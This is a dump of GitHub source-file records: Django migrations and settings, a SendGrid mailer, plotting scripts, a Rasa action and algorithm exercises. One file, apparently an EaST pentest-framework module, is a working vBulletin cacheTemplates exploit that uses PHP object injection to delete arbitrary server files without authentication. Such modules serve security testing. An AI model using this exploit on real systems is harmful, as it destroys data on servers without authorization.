print(pool2d(X))
| [
"[email protected]"
] | |
f3a07f02268fdfe27b330e612e8b7945659aa549 | 77c7c1bb838fe3c7972e1fd54aab21ce50da0654 | /bhp045/apps/cancer_subject/models/subject_off_study_mixin.py | 5d0ff6fbd5c6fd21124adcf8aafec5f26650affd | [] | no_license | botswana-harvard/cancer | 394124fe4cb8ae5e03ca70842a13e20220201be9 | 410cdd637d1da5b9d5081da02697eb1d03ae0984 | refs/heads/master | 2021-01-21T18:24:58.316116 | 2017-05-22T13:11:05 | 2017-05-22T13:11:05 | 92,045,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | from edc.subject.off_study.mixins.off_study_mixin import OffStudyMixin
class SubjectOffStudyMixin(OffStudyMixin):
def get_off_study_cls(self):
from .subject_off_study import SubjectOffStudy
return SubjectOffStudy
| [
"[email protected]"
] | |
6abde58c2c7813da0693cc6347cd6916351e7fd8 | 4c2def4621865535d36e6beb605691a6d53628d4 | /ask_weather/action.py | af6d79fd48a1e8ad45ce006213b73d645d5dcce1 | [] | no_license | liaozhihui/work | 4485722c73a796c25896bb083d84d0e4f79e05c5 | 61a11d591875e17818b1b303d3552818441efafc | refs/heads/master | 2020-07-16T17:04:07.788674 | 2019-09-02T10:13:28 | 2019-09-02T10:13:28 | 205,828,908 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | from rasa_core_sdk import Action
from rasa_core_sdk.events import SlotSet
class ActionAskWeather(Action):
    """Rasa custom action for the weather intent.

    NOTE(review): the reply asks the user WHERE they want the weather, yet
    the city slot is unconditionally set to '深圳' — confirm this placeholder
    is intentional.
    """

    def name(self):
        # Identifier referenced from the Rasa domain file.
        return 'action_ask_weather'

    def run(self, dispatcher, tracker, domain):
        dispatcher.utter_message(f'您问的天气地点是哪里呢')
        return [SlotSet('city', '深圳')]
| [
"[email protected]"
] | |
c212b7abfa204151fd7118f9c1047b5c3fb541c4 | a9d4beb507b284e0a30b6f6522d448bec37ab7d6 | /math/0x01-plotting/5-all_in_one.py | c1616e1f02491a0cca18080e0f79cb2b3375c8b4 | [] | no_license | Danucas/holbertonschool-machine_learning | b9aedaccb93627adb9514f6c2fae1b67a1aeb0af | 83e6185ebe3935f4fea27afa5db9f448722f2e2a | refs/heads/main | 2023-07-12T17:08:02.813748 | 2021-08-17T05:22:30 | 2021-08-17T05:22:30 | 318,015,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,830 | py | #!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
y0 = np.arange(0, 11) ** 3
mean = [69, 0]
cov = [[15, 8], [8, 15]]
np.random.seed(5)
x1, y1 = np.random.multivariate_normal(mean, cov, 2000).T
y1 += 180
x2 = np.arange(0, 28651, 5730)
r2 = np.log(0.5)
t2 = 5730
y2 = np.exp((r2 / t2) * x2)
x3 = np.arange(0, 21000, 1000)
r3 = np.log(0.5)
t31 = 5730
t32 = 1600
y31 = np.exp((r3 / t31) * x3)
y32 = np.exp((r3 / t32) * x3)
np.random.seed(5)
student_grades = np.random.normal(68, 15, 50)
parameters = {
'axes.labelsize': 'x-small',
'axes.titlesize': 'x-small'
}
plt.rcParams.update(parameters)
fig = plt.figure()
ax1 = plt.subplot2grid((3, 2), (0, 0), colspan=1)
# adding ax 1
ax1.set_xlim(0, 10)
ax1.plot(y0)
# adding ax 2
ax2 = plt.subplot2grid((3, 2), (0, 1), colspan=1)
ax2.title.set_text("Men's Height vs Weight")
ax2.scatter(x1, y1, c=['#d065cb'])
ax3 = plt.subplot2grid((3, 2), (1, 0), colspan=1)
# adding ax 3
ax3.set_xlabel('Fraction Remaining')
ax3.set_ylabel('Time (years)')
ax3.set_yscale('log')
ax3.set_xlim(0, 28650)
ax3.plot(x2, y2)
# adding ax 4
ax4 = plt.subplot2grid((3, 2), (1, 1), colspan=1)
ax4.title.set_text('Exponential Decay of Radioactive Elements')
ax4.set_xlim(0, 20000)
ax4.set_ylim(0, 1)
line1, = ax4.plot(x3, y31, color="#eb473f", label="C-14", linestyle="dashed")
line2, = ax4.plot(x3, y32, color="#4f9720", label="Ra-226")
ax4.legend((line1, line2), (line1.get_label(), line2.get_label()))
# adding ax 5: grades histogram spanning the full bottom row
ax5 = plt.subplot2grid((3, 2), (2, 0), colspan=2)
ax5.title.set_text('Project A')
ax5.set_xlabel('Grades')
# Was a second set_xlabel call, which clobbered the 'Grades' label;
# 'Number of students' belongs on the y axis.
ax5.set_ylabel('Number of students')
ax5.set_xlim(0, 100)
ax5.set_ylim(0, 30)
ax5.hist(student_grades, range=(0, 100), bins=10, edgecolor='black', linewidth=1.2)
for ax in fig.axes:
print(ax)
fig.suptitle('All in one')
fig.tight_layout()
plt.show()
| [
"[email protected]"
] | |
d20d0862c0bc14f8a343819a18037592d6950392 | 734a31e81f206c0bb9ab1e1fd6745a29aaa10b14 | /src/products/migrations/0015_auto_20180115_0209.py | 86f87585cdc543286771d23aa9edee108ffaf53d | [
"MIT"
] | permissive | shan18/Kart | d39974ba3f2eca14e68f6e51ed9132ffcf8a540a | a38f648d00b829a2f0a875e78c102c62c9718ee1 | refs/heads/master | 2022-12-10T05:33:41.198309 | 2022-11-29T07:16:32 | 2022-11-29T07:16:32 | 118,975,709 | 26 | 18 | MIT | 2020-06-08T09:47:11 | 2018-01-25T22:34:36 | Python | UTF-8 | Python | false | false | 622 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-01-14 20:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add `free` and `user_required` boolean flags to ProductFile."""

    dependencies = [
        ('products', '0014_auto_20180114_0359'),
    ]

    operations = [
        migrations.AddField(
            model_name='productfile',
            name='free',
            field=models.BooleanField(default=False),
        ),
        migrations.AddField(
            model_name='productfile',
            name='user_required',
            field=models.BooleanField(default=False),
        ),
    ]
| [
"[email protected]"
] | |
8b363f046499487518a67cb87eb0ec039c027f5f | 025333407ea7219540c4873091ade8bff9ced829 | /manage.py | f2211cdbdecf378c6af5618fe89fcac935d26090 | [] | no_license | PyconUK/ironcage18 | 317b6250019f0173c421b0f1980dcee52c727528 | 4ffb1c8449437f8d4dc08a1f344d47383b542598 | refs/heads/master | 2021-04-15T18:24:30.180384 | 2019-05-15T08:48:57 | 2019-05-15T08:57:20 | 126,659,139 | 1 | 4 | null | 2018-10-10T07:38:22 | 2018-03-25T02:53:05 | Python | UTF-8 | Python | false | false | 714 | py | #!/usr/bin/env python
import os
import sys
import dotenv
if __name__ == "__main__":
if 'test' in sys.argv:
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ironcage.settings.test")
else:
dotenv.read_dotenv()
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ironcage.settings.local")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
31ab032e54bf47596e702e42e35b49e5afb56914 | dbd87fe6e9466c4cada18b037667cfdddc62c193 | /data/Quandl/Quandl_to_Email/mailer.py | fc9f7c8bf40471494b8853214d35944ab0aff2b3 | [] | no_license | alexanu/Python_Trading_Snippets | 74515a40dc63ba50d95bd50330ed05d59b5dc837 | 85969e681b9c74e24e60cc524a952f9585ea9ce9 | refs/heads/main | 2023-06-25T03:27:45.813987 | 2023-06-09T16:09:43 | 2023-06-09T16:09:43 | 197,401,560 | 18 | 17 | null | 2023-02-08T22:25:25 | 2019-07-17T14:05:32 | Jupyter Notebook | UTF-8 | Python | false | false | 1,112 | py | import sendgrid
import os
from sendgrid.helpers.mail import Email, Content, Mail
class Mailer(object):
    """Thin wrapper around the SendGrid v3 client for sending simple emails."""

    def __init__(self):
        # os.environ[key] raises KeyError when the variable is absent and
        # never returns None, so the original `is None` check could never
        # fire; use .get() so the intended EnvironmentError is raised.
        api_key = os.environ.get("SENDGRID_API_KEY")
        if api_key is None:
            raise EnvironmentError("Missing env SENDGRID_API_KEY")
        self.sendgrid_client = sendgrid.SendGridAPIClient(apikey=api_key)

    def send_mail(self, from_address, to_address, subject, body, content_type="text/plain"):
        """Send one email and return the raw SendGrid API response.

        content_type defaults to plain text; pass "text/html" for HTML.
        """
        from_email = Email(from_address)
        to_email = Email(to_address)
        content = Content(content_type, body)
        mail = Mail(from_email, subject, to_email, content)
        response = self.sendgrid_client.client.mail.send.post(
            request_body=mail.get())
        return response
if __name__ == '__main__':
    # Manual smoke test: sends a real email via SendGrid when run directly.
    mailer = Mailer()
    response = mailer.send_mail(
        from_address="[email protected]",
        to_address="[email protected]",
        subject="Subject - Test mail",
        body="Test mail ABC")
    print(response.status_code)
    print(response.body)
    print(response.headers)
"[email protected]"
] | |
0e83a10947f41ecdc8506924ac075dff32b6b7b0 | 5b6ec656a247d10011fd67a920aa002ebdf873c3 | /GithubOctarofile/GithubOctarofile/urls.py | d618d9a5c3257a4b79841c4d90f628af694f8d70 | [] | no_license | KhaledAbuNada-AI/Django-Projects | cfb46d46da5f5358171294ca8c02c62c5babf2cf | ff264426d7a650f3c513678bbd71b5519372f6d3 | refs/heads/master | 2022-04-24T10:52:26.791436 | 2020-04-22T15:27:37 | 2020-04-22T15:27:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 976 | py | """GithubOctarofile URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('Octaprofile/', include('OctaProfile.urls'))
]
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) | [
"[email protected]"
] | |
cc33c74f1c0ac7232046e55292d8b413ca1bc988 | 5759c0ed3219c06437ce5b39ef9ad92b5e191fed | /py/0114_flatten_binary_tree_to_linked_list.py | 50bdf3fcfc9bb4e70f86523429fbe8d284228f61 | [] | no_license | mengnan1994/Surrender-to-Reality | ba69df7c36112ad19f19157a9f368eae6340630f | 66232728ce49149188f863271ec2c57e426abb43 | refs/heads/master | 2022-02-25T01:34:49.526517 | 2019-09-22T17:21:28 | 2019-09-22T17:21:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,498 | py | """
Given a binary tree, flatten it to a linked list in-place.
For example, given the following tree:
1
/ \
2 5
/ \ \
3 4 6
The flattened tree should look like:
1
\
2
\
3
\
4
\
5
\
6
"""
class TreeNode:
    """Plain binary-tree node."""

    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None


class Solution:
    def __init__(self):
        self._precursor = None  # reserved for the planned O(1)-space variant

    def flatten(self, root):
        """Flatten the tree rooted at *root*, in place, into a right-leaning
        linked list whose order is the tree's preorder traversal.
        """
        if root is None:  # original crashed with AttributeError on an empty tree
            return
        node_list = []
        self._preorder_traverse(root, node_list)
        # Re-thread: each node's right points to its preorder successor.
        for prev, nxt in zip(node_list, node_list[1:]):
            prev.left = None
            prev.right = nxt
        node_list[-1].left = None
        node_list[-1].right = None
        # (No need to rebind root: node_list[0] IS root, and the rewiring
        # above mutated the tree in place — the original's `root = ...`
        # rebound only a local name.)

    def _preorder_traverse(self, node, node_list):
        """Append nodes to *node_list* in preorder (root, left, right)."""
        node_list.append(node)
        if node.left:
            self._preorder_traverse(node.left, node_list)
        if node.right:
            self._preorder_traverse(node.right, node_list)

    def flaten_2(self, root):  # sic: misspelled name kept for compatibility
        """Planned O(1)-space variant: for each node, its left subtree's
        rightmost node is the preorder predecessor of the right child.
        Not implemented.
        """
        pass
| [
"[email protected]"
] | |
e2edb5d82d0b7b9a5ce5c04dca7d99743fcc26ab | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /week_or_work/give_group/go_place/fact/child/world.py | ef11efc3b6b9c83521114179cecdc22ea2e4faa1 | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#! /usr/bin/env python
def fact_or_different_group(str_arg):
other_thing(str_arg)
print('last_life_and_time')
def other_thing(str_arg):
print(str_arg)
if __name__ == '__main__':
fact_or_different_group('part')
| [
"[email protected]"
] | |
ba89f8b4fbc89acfbdb68504386a71ea5e70c4ca | b3fc641d4a746401301d917d42dd204a8661874b | /authors/apps/articles/migrations/0009_reported_times_reported.py | 7fd11b5ff494f57db3c9d8ee75cc09f9b68ec1b0 | [
"BSD-3-Clause"
] | permissive | andela/ah-backend-lannister | 7998e0f9729036627ef2aabcdb1bb3c89b356727 | 091bd7e892eb0709a937f0f992f2675ab81ce40c | refs/heads/develop | 2020-03-29T02:31:52.662672 | 2018-11-20T09:14:50 | 2018-11-20T09:14:50 | 149,441,528 | 0 | 5 | BSD-3-Clause | 2018-11-20T09:14:51 | 2018-09-19T11:39:36 | Python | UTF-8 | Python | false | false | 394 | py | # Generated by Django 2.1.1 on 2018-10-18 13:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0008_auto_20181018_1517'),
]
operations = [
migrations.AddField(
model_name='reported',
name='times_reported',
field=models.IntegerField(default=0),
),
]
| [
"[email protected]"
] | |
d77cc9cfc19abaad7bd34df16677a4312d3ea8d1 | f7648ea1c8a9565371c3d4654f7bdf1f2c9278f5 | /BAEK_JOON/Python_algorithm/백준_11053번_가장긴증가하는부분수열.py | 46abd5d65adc6c66937eba0785359af736f28207 | [] | no_license | Sungmin-Joo/Algorithm-competition | 521e019d532cc73e7620c5d1218142d32820eb1f | 6b9513e15f284d95a21eecd84a0a4d0f2ff03402 | refs/heads/master | 2020-05-01T15:25:16.404513 | 2020-01-19T10:41:25 | 2020-01-19T10:41:25 | 177,546,171 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py | import sys
input = sys.stdin.readline
global dp, l
n = int(input())
arr = [*map(int,input().split())]
dp = [0] * n
m = 0
for i in range(n):
if i == 0:
dp[i] = 1
else:
max_dp = 0
for j in range(0, i):
if max_dp < dp[j] and arr[j] < arr[i]:
max_dp = dp[j]
dp[i] = max_dp+1
print(max(dp)) | [
"[email protected]"
] | |
61b16488d1272ea297377739b9d59515dbe88c4f | 2f963d7989749037a3ec27aaa39b31416b33cbb2 | /ib_recommender/interfaces/ib_recommender_service_interface.py | d49a6e35f35d335762e37a87f3106329613780e4 | [] | no_license | migsantos121/phd3-backend | 3cd014908856c995de3c4473d82059bc9c1b5794 | 9d1d2bd6f55dc89719ce5a1916c5db3d573aec1e | refs/heads/master | 2022-12-12T17:25:59.334509 | 2020-03-09T09:24:08 | 2020-03-09T09:24:08 | 245,991,086 | 0 | 0 | null | 2022-06-28T14:45:50 | 2020-03-09T09:17:18 | Python | UTF-8 | Python | false | false | 1,562 | py | from django_swagger_utils.drf_server.decorators.handle_exceptions import handle_exceptions
from ib_common.interface_utils.interface_utils import InterfaceUtils
__author__ = 'ibhubs'
class IBRecommenderServiceInterface(InterfaceUtils):
def __init__(self, *args, **kwargs):
super(IBRecommenderServiceInterface, self).__init__(*args, **kwargs)
@property
def service_flag(self):
from django.conf import settings
from ib_common.constants.service_types import ServiceTypesEnum
return getattr(settings, 'IB_RECOMMENDER_REQUEST_TYPE', ServiceTypesEnum.LIBRARY.value)
@property
def service_base_url(self):
from django.conf import settings
return self.clean_base_url(getattr(settings, 'IB_RECOMMENDER_BASE_URL', '')) + 'api/ib_recommender/'
@property
def client_key_details_id(self):
return 1
@handle_exceptions()
def get_articles(self, request_data=None, path_params=None, query_params=None, headers_obj=None, **kwargs):
setattr(self, 'request_data', request_data)
setattr(self, 'path_params', path_params)
setattr(self, 'query_params', query_params)
setattr(self, 'headers_obj', headers_obj)
setattr(self, 'request_type', 'POST')
setattr(self, 'url_tail', 'articles/')
def api_wrapper(*args, **kwargs):
from ib_recommender.views.get_articles.api_wrapper import api_wrapper
return api_wrapper(*args, **kwargs)
setattr(self, 'api_wrapper', api_wrapper)
return self.execute()
| [
"[email protected]"
] | |
6211c93ef5e464339a3ece24a4c1a0c77ec991bc | 419873dd3b7412f704b1a7907b64a60b44cedf39 | /python/设计/157. 用 Read4 读取 N 个字符.py | 014893b2ac1f2b51dbcea4b77c5c3014bcf07fec | [] | no_license | Weless/leetcode | 0585c5bfa260713f44dabc51fa58ebf8a10e7814 | 0566622daa5849f7deb0cfdc6de2282fb3127f4c | refs/heads/master | 2021-11-13T07:59:20.299920 | 2021-10-25T02:09:53 | 2021-10-25T02:09:53 | 203,720,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 409 | py | class Solution:
def read(self, buf, n):
count=0
while count<n:
temp = [''] * 4
cur = read4(temp)
if cur == 0 :
break
i = 0
while i < cur and count <n:
buf[count] = temp[i]
count += 1
i+=1
return count
| [
"[email protected]"
] | |
99d0b1a49a4b2b619be7874cf19a6e505931f6d8 | 35b6013c1943f37d1428afd2663c8aba0a02628d | /appengine/flexible_python37_and_earlier/storage/noxfile_config.py | a97c6f1e260127c6b721ab0af921439d0e47fcf6 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | GoogleCloudPlatform/python-docs-samples | d2a251805fbeab15d76ed995cf200727f63f887d | 44e819e713c3885e38c99c16dc73b7d7478acfe8 | refs/heads/main | 2023-08-28T12:52:01.712293 | 2023-08-28T11:18:28 | 2023-08-28T11:18:28 | 35,065,876 | 7,035 | 7,593 | Apache-2.0 | 2023-09-14T20:20:56 | 2015-05-04T23:26:13 | Jupyter Notebook | UTF-8 | Python | false | false | 1,892 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Default TEST_CONFIG_OVERRIDE for python repos.
# You can copy this file into your directory, then it will be imported from
# the noxfile.py.
# The source of truth:
# https://github.com/GoogleCloudPlatform/python-docs-samples/blob/main/noxfile_config.py
TEST_CONFIG_OVERRIDE = {
# You can opt out from the test for specific Python versions.
"ignored_versions": ["2.7", "3.8", "3.9", "3.10", "3.11"],
# Old samples are opted out of enforcing Python type hints
# All new samples should feature them
"enforce_type_hints": True,
# An envvar key for determining the project id to use. Change it
# to 'BUILD_SPECIFIC_GCLOUD_PROJECT' if you want to opt in using a
# build specific Cloud project. You can also use your own string
# to use your own Cloud project.
"gcloud_project_env": "GOOGLE_CLOUD_PROJECT",
# 'gcloud_project_env': 'BUILD_SPECIFIC_GCLOUD_PROJECT',
# If you need to use a specific version of pip,
# change pip_version_override to the string representation
# of the version number, for example, "20.2.4"
"pip_version_override": None,
# A dictionary you want to inject into your test. Don't put any
# secrets here. These values will override predefined values.
"envs": {"CLOUD_STORAGE_BUCKET": "python-docs-samples-tests-public"},
}
| [
"[email protected]"
] | |
764482f357be9bb1f771028e738e7a9b659a4c28 | f361126ee099303113b5ed3cc0e838bd01a9e41b | /Semana3/apoio_pense_python_01.py | 70ff1f0e90b4ccda9dbca5bab5a6967a4df4cce8 | [] | no_license | ju-c-lopes/Univesp_Algoritmos_II | e1ce5557d342ea75fe929cf7b207e633f9aa89cd | 5d4eec368be91c18f0ae5c17d342e6eb0f1c79be | refs/heads/master | 2023-06-05T11:09:25.415719 | 2021-07-07T22:26:53 | 2021-07-07T22:26:53 | 383,600,096 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py | def list_sum(num_list):
the_sum = 0
for i in num_list:
the_sum = the_sum + i
return the_sum
print(f'Função {list_sum([1, 3, 5, 7, 9])}')
soma_1 = ((((1 + 3) + 5) + 7) + 9)
print(f'Soma 1 "((((1 + 3) + 5) + 7) + 9)" = {soma_1}')
soma_2 = (1 + (3 + (5 + (7 + 9))))
print(f'Soma 2 "(1 + (3 + (5 + (7 + 9))))" = {soma_2}')
print("EXPLICAÇÃO:\n")
print("total = (1 + (3 + (5 + '_______'))) # resolve primeiro o laço mais interno\n"
". (7 + 9)\n"
". total = (1 + (3 + '________')) # resolve próximo laço mais interno com a soma anterior\n"
". (5 + 16)\n"
". total = (1 + '________') # resolve próximo laço mais interno com a soma anterior\n"
". (3 + 21)\n"
". total = (1 + 24) # por fim, resolve a última soma, resultando o total final\n"
".\n"
". total = 25")
def soma_lista(num_list):
if len(num_list) == 1:
return num_list[0]
else:
return num_list + list_sum(num_list[1:])
print(f'\n{list_sum([1, 3, 5, 7, 9])}')
print("""
TESTE:
def soma(a, b=0):
return a + b
print(soma(9, soma(7, soma(5, soma(3, soma(1))))))
""")
def soma(a, b=0):
return a + b
print(soma(9, soma(7, soma(5, soma(3, soma(1))))))
| [
"[email protected]"
] | |
272fe74eaf3eb220407cf3f170f25e94cf1d1ea6 | 37908440ce625e4ad15c7fdae0f5c42a0f7f06cd | /exploits/efa_vbulletin_afd.py | 8b51cf55eb2f9dbda403b2f0c0a4eaa2fdf4901a | [] | no_license | sec-js/EaST | daff1c84e73e43825a87e3c2c1ec63d05d73141b | 4b1ab5333022bbd476e9a43f13c4a4b559488752 | refs/heads/master | 2023-01-07T13:14:28.480980 | 2022-09-18T18:21:19 | 2022-09-18T18:21:19 | 337,508,843 | 0 | 0 | null | 2022-12-21T23:26:22 | 2021-02-09T19:09:47 | null | UTF-8 | Python | false | false | 3,347 | py | #! /usr/bin/env python
# -*- coding: utf_8 -*-
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
import sys
import os
import urllib2
from collections import OrderedDict
sys.path.append('./core')
from Sploit import Sploit
INFO = {}
INFO['NAME'] = "efa_vbulletin_afd"
INFO['DESCRIPTION'] = "vBulletin cacheTemplates - Unauthenticated Remote Arbitrary File Deletion"
INFO['VENDOR'] = "https://www.vbulletin.com/"
INFO['DOWNLOAD_LINK'] = ''
INFO['LINKS'] = ['https://blogs.securiteam.com/index.php/archives/3573']
INFO["CVE Name"] = ""
INFO["NOTES"] = """By sending POST request an unauthenticated attacker can delete files from the victims server
"""
INFO['CHANGELOG'] = "15 Dec 2017. Written by Gleg team."
INFO['PATH'] = 'Exploits/Web/'
# Must be in every module, to be set by framework
OPTIONS = OrderedDict()
OPTIONS["HOST"] = "127.0.0.1", dict(description = 'Target IP')
OPTIONS["PORT"] = 80, dict(description = 'Target port')
OPTIONS["BASEPATH"] = '/vb', dict(description = 'Basepath')
OPTIONS['PATH'] = '/path/to/file', dict(description = 'File to delete')
OPTIONS['SSL'] = False, dict(description = 'Use SSL')
class exploit(Sploit):
def __init__(self, host = "", port = 0, logger = None):
Sploit.__init__(self, logger = logger)
self.name = INFO['NAME']
self.host = host
self.port = port
self.ssl = False
self.basepath = "/"
self.path = OPTIONS['PATH']
def args(self):
self.args = Sploit.args(self, OPTIONS)
self.host = self.args.get('HOST', self.host)
self.port = int(self.args.get('PORT', self.port))
self.path = self.args.get('PATH', OPTIONS['PATH'])
self.ssl = bool(self.args.get('SSL', False))
self.basepath = self.args.get('BASEPATH', self.basepath)
if self.ssl:
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
opener = urllib2.build_opener(urllib2.HTTPSHandler(context=context))
urllib2.install_opener(opener)
def make_url(self, path = ''):
return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)
def prot(self):
return self.ssl and 'https://' or 'http://'
def run(self):
self.args()
self.log("Attacking {}".format(self.host))
url = self.make_url('/ajax/api/template/cacheTemplates')
data = 'templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:LEN:"FILE";}'
data = data.replace('LEN', str(len(self.path)))
data = data.replace('FILE', self.path)
self.log('Try to delete file ' + self.path)
try:
request = urllib2.Request(url, data)
fd = urllib2.urlopen(request)
content = fd.read()
except Exception as e:
self.log(e)
self.finish(False)
self.finish(True)
if __name__ == '__main__':
"""
By now we only have the tool mode for exploit..
Later we would have standalone mode also.
"""
print "Running exploit %s .. " % INFO['NAME']
e = exploit('', 80)
e.run()
| [
"[email protected]"
] | |
dd63d8ff2276e64b1806676cac723baf74f0ecb7 | 306afd5282d9c24d58297478a1728a006c29e57e | /lintcode/lintcode_0547_Intersection_of_Two_Arrays.py | ddcecd3100ee335a8a14d3b209fb6a19895c1786 | [] | no_license | ytatus94/Leetcode | d2c1fe3995c7a065139f772569485dc6184295a9 | 01ee75be4ec9bbb080f170cb747f3fc443eb4d55 | refs/heads/master | 2023-06-08T17:32:34.439601 | 2023-05-29T04:33:19 | 2023-05-29T04:33:19 | 171,921,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 600 | py | from typing import (
List,
)
class Solution:
"""
@param nums1: an integer array
@param nums2: an integer array
@return: an integer array
we will sort your return value in output
"""
def intersection(self, nums1: List[int], nums2: List[int]) -> List[int]:
# write your code here
if not nums1 or not nums2:
return []
hash_set = set()
for i in nums1:
hash_set.add(i)
result = set()
for i in nums2:
if i in hash_set:
result.add(i)
return list(result)
| [
"[email protected]"
] | |
1a770f79fd81c17269f4ed63636862fb554d30ca | 0f205fa73d927a15e27f065c6a198935f90d3ada | /src/pycones/proposals/migrations/0001_initial.py | 50994be6deb17fc6ba0539338afcce03c1f8e433 | [] | no_license | python-spain/web-pycones | b27bfb630cb6eafb8e1a5aadfa7b35368f81325a | 942516169738689f542b0856842372088f34fc2f | refs/heads/2020 | 2023-03-30T06:01:30.809205 | 2020-03-23T22:08:27 | 2020-03-23T22:08:27 | 80,434,627 | 3 | 4 | null | 2021-04-08T20:55:32 | 2017-01-30T15:36:49 | CSS | UTF-8 | Python | false | false | 4,690 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-31 12:32
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import markupfield.fields
import model_utils.fields
import taggit_autosuggest.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('speakers', '0001_initial'),
('taggit', '0002_auto_20150616_2121'),
]
operations = [
migrations.CreateModel(
name='Proposal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('audience_level', models.CharField(choices=[('basic', 'Básico'), ('intermediate', 'Intermedio'), ('advanced', 'Avanzado')], default='basic', max_length=32, null=True, verbose_name='Nivel de la audiencia')),
('language', models.CharField(choices=[('es', 'Español'), ('en', 'Inglés')], default='es', max_length=2, verbose_name='Idioma')),
('duration', models.PositiveIntegerField(blank=True, choices=[(15, '15 minutos'), (30, '30 minutos')], default=30, null=True, verbose_name='Duración')),
('title', models.CharField(max_length=100, verbose_name='Título')),
('description', models.TextField(help_text='Si tu propuesta se acepta esto se hará público, y se incluirá en el programa. Debería ser un párrafo, con un máximo de 500 caracteres.', max_length=500, verbose_name='Breve descripción')),
('abstract', markupfield.fields.MarkupField(blank=True, default='', help_text="Resumen detallado. Se hará pública si la propuesta se acepta. Edita usando <a href='http://daringfireball.net/projects/markdown/basics' target='_blank'>Markdown</a>.", rendered_field=True, verbose_name='Resumen detallado')),
('abstract_markup_type', models.CharField(choices=[('', '--'), ('markdown', 'markdown')], default='markdown', max_length=30)),
('additional_notes', markupfield.fields.MarkupField(blank=True, default='', help_text="Cualquier cosa que te gustaría hacer saber a los revisores para que la tengan en cuenta al ahora de hacer la selección. Esto no se hará público. Edita usando <a href='http://daringfireball.net/projects/markdown/basics' target='_blank'>Markdown</a>.", rendered_field=True, verbose_name='Notas adicionales')),
('_abstract_rendered', models.TextField(editable=False)),
('additional_notes_markup_type', models.CharField(choices=[('', '--'), ('markdown', 'markdown')], default='markdown', max_length=30)),
('cancelled', models.BooleanField(default=False)),
('_additional_notes_rendered', models.TextField(editable=False)),
('notified', models.BooleanField(default=False)),
('accepted', models.NullBooleanField(default=None, verbose_name='Aceptada')),
('accepted_notified', models.BooleanField(default=False, verbose_name='Notificación de aceptación enviada')),
('code', models.CharField(blank=True, max_length=64, null=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ProposalKind',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, verbose_name='Name')),
('slug', models.SlugField()),
],
),
migrations.AddField(
model_name='proposal',
name='kind',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='proposals.ProposalKind', verbose_name='Tipo de propuesta'),
),
migrations.AddField(
model_name='proposal',
name='speakers',
field=models.ManyToManyField(related_name='proposals', to='speakers.Speaker'),
),
migrations.AddField(
model_name='proposal',
name='tags',
field=taggit_autosuggest.managers.TaggableManager(blank=True, help_text='Lista de etiquetas separadas por comas.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Etiquetas'),
),
]
| [
"[email protected]"
] | |
